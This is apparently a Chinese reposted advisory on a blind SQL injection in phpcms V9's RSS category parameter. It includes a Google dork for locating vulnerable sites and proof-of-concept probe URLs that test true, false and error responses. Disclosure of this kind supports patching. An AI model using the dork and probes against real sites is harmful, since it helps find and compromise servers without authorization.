手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpcms V9 BLind SQL 注入漏洞0day
phpcms V9 BLind SQL 注入漏洞0day
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...

影响版本:phpcms v9 blind

官方网站:http://www.phpcms.cn

漏洞类型:SQL注入

漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

google dork:inurl:"index.php?m=content+c=rss+catid=10"

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

【phpcms V9 BLind SQL 注入漏洞0day】相关文章:

DedeCms V5.1 tag.php注入漏洞

dedecms 5.6的最新注入漏洞

Microsoft SharePoint 服务器源码 HTML 注入漏洞

金山毒霸多个sql注入及XSS漏洞和修复

OmniPCX Enterprise存在远程命令注入漏洞

MirOS BSD Korn Shell本地权限提升漏洞

CA BrightStor ARCserve Backup 存漏洞

Linux Kiss Server多个格式串处理漏洞

Coppermine Photo Gallery跨站脚本及SQL注入漏洞

phpcms2008 注入漏洞

精品推荐
分类导航